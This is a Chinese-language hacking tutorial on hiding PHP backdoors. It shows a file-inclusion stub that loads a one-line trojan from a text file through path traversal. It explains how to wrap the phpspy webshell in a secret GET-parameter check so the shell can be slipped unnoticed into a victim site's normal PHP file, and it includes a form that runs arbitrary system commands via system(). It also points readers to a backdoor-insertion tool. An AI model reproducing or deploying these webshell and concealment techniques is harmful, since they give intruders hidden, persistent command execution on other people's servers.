PHP後門隐藏

首先建立一PHP檔案test.php 檔案内容為:

　　

　　$test=$_GET['test'];

　　@include 'test/'.$test;

　　?> 　　

　　Txt檔案一般都是說明檔案，是以我們把一句話木馬放到目錄的說明檔案裡就OK了。随便建立一個TXT檔案t.txt。我們把一句話木馬粘貼到t.txt檔案裡。然後通路[url]http://localhost/test/test.php?test=../t.txt[/url]如果你看到t.txt的内容就證明Ok了， 然後把在lanker微型PHP後門用戶端 木馬位址添入[url]http://localhost/test/test.php?test=../t.txt[/url]密碼裡添入cmd就可以了，執行傳回的結果都可以看到。 

方法2現在的webshell是越來越流行了，連php的後門也追上來了，主要的有angel的phpspy和lanker的一句話後門！是以現在最主要的是怎麼隐蔽我們的後門，想必看完我的文章大家都有自己各自的想法了。 其實lanker的一句話後門确實很強大，但是要使用者使用用戶端的話會帶來一些不必要的麻煩，雖然可以使程式沒有記錄，（POST沒記錄的哦）但是對于一般的站點這其實并不是很重要。 有沒與想過把phpspy插到一個檔案裡去呢？沒有想過嗎？ 呵呵，跟我來，我們用記事本打開phspy就好了，搜尋登入入口四個字。 在

  function loginpage() { ?>    

後面加上  

<? if ($ _ GET[name] == wrsky) { ?>    

 再在  

<?php      exit;   }//end loginpage()      

 前面面加上  

 <? } ?>    

 現在你可以把這一個phpspy都寫到對方的某個正常的php檔案裡，直接浏覽是看不出問題的喔，我們要登入的時候就直接在檔案名後面加上?name=wrsky才可以看到   當然你也可以改成别的，隻要替代上面 代碼 裡的name和wrsky就可以的，相信自己動手你會覺得收獲很大的。 如果你要自己改寫一些簡單的 代碼 而你又不會php的話，這裡就有樣東西要介紹給你哦~php後門插入器，呵呵，你可以在[url]http://www.wrsky.com[/url]  火狐下載下傳到它~~ 我們來看看怎麼使用這個 工具 。先看看這個程式的樣子。  呵呵~紅色的喔，粉PP吧~~我們來測試一下，我在這裡提供一段 代碼  

<center>執行CMD指令</center>  <form action= method=POST>  <center>想執行的指令:  <input name=cmd size=40 value=<?echo$cmd?>>  <input name=action type=hidden value=run>  <input type=submit class=INPUT value=執行<?echo PHP _ OS;?>系統指令></form>  <td align=center>  <textarea name=textarea cols=100 rows=25 readonly>  <?  if($ _ POST[action] == run){ @system($ _ POST[cmd]);  }  ?> </textarea>    

 這段 代碼 是執行cmd指令的，我們利用插入 工具 進行插入看看！ 沒插入前的樣子  我的設定為參數名為name，參數值為wrsky。插入檔案我用了相對路徑./ceshi.php 大家可以參考我插入的設定。因為程式和要插入的檔案在同目錄是以我寫了./ceshi.php當然了，你也可以寫成/home/imaboy/bk.php（因為這是 linux 系統） 顯示寫入檔案成功，我們開始連接配接咱的 木馬 ，以為我用的參數的name，值是wrsky，是以連接配接方式為 木馬 所在位址?name=wrsky 大家可以看到，在輸入後面的參數後運作完全正常，而且不易被發現喔，很可能被帶到另外一台主機上去喔 。 ，

呵呵，隻要想一點，你們肯定還會有更好的辦法的！